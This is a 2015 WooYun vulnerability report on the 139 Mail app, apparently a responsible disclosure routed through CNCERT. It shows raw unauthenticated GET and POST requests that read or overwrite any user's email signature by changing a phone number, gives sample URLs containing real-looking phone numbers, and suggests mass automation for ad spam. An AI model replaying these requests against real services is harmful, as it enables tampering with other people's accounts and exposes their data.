当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0113490
漏洞标题:
139邮箱app可查看并设置任意用户邮件签名(可自动批量修改)
相关厂商:
中国移动
漏洞作者:
小手冰凉
提交时间:
2015-05-11 19:33
修复时间:
2015-06-29 16:08
公开时间:
2015-06-29 16:08
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
15
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

139邮箱app可设置任意用户签名
用来发广告效果肯定好

详细说明:

手机登陆139邮箱app,抓取到如下数据包

GET /peStatistics/clientInterface/user/settings/<手机号>HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; Custom Phone - 4.1.1 - API 16 - 768x1280 Build/JRO03S)
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip


返回数据中是一串base64编码的用户邮件签名。观察数据包发现完全没有包含类似token这样的认证字段,也就是可以查看任意人的邮件签名。
例子

http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905247273
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905246932
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905244566
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905241987
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905242001


同样在保存邮件签名设置时抓到如下数据包

POST /peStatistics/clientInterface/user/settings/save HTTP/1.1
Content-Length: 342
Content-Type: application/x-www-form-urlencoded
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip
mobileNum=<手机号>&settingString=NQclQmCFz000000YlLsiAM1DmgtifLlcoYzI3rz923Q0VMmSXrbyTJtEnzO10%2FtmIoXXMkBAYMc9tfpwRdP7ZiKF1zJMeKnf8sPtVPaP15fB%2BUhlzb3e83lBy1QubzQDqDYXKxhJmvjt5s21tk%2F7syTpNK59adkK7%2Fbbsh7yRbYcmmPZvBk4Tsex803w3okFp%2FyK4tOb7RYZovw8SsDMFkr0nRun03HUO7fbAHM7XVH%2BH2xhVLQA%2FRTNLjEdnfpLqXorBBLqodnr8X5n%2B3svlInq8yUQ%3D%3D


不难发现就是设置用户签名的接口。修改手机号能够设置任意用户邮件签名。
ps:这个网站<www.gdleadtone.com>很神奇,刚开通139邮箱的时候是查询不到签名的,需要等大约十几分钟,可能是从139的数据库同步过来的。

漏洞证明:

刚登录时,这是默认的用户签名

捕获.PNG


然后提交如下数据包

POST /peStatistics/clientInterface/user/settings/save HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; Custom Phone - 4.1.1 - API 16 - 768x1280 Build/JRO03S)
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 212
mobileNum=<我的手机号>&settingString=NQclQmCFzYlLsiAM1DmgtifLlcoYzI3r8ccS0sBNV2l1jXW62j5AIF0%2FtmIoXXMkBAYMc9tfpwRdP7ZiKF1zJGOS9rdYriugxzAMKK3PEznb3e83lBy1QvIo4hUZr5h3S7PvYfyfmQbb3e83lBy1Ql4kZ3wzsMvbVhuDDamnMa0%3D


然后在重新登录邮箱

捕获.PNG

签名已经被修改。
这个过程完全可以自动化,遍历手机号,修改签名........

修复方案:

这个www.gdleadtone.com网站肯定还存在很多类似的非认证的接口,添加认证

版权声明:转载请注明来源 小手冰凉@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-05-15 16:07

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无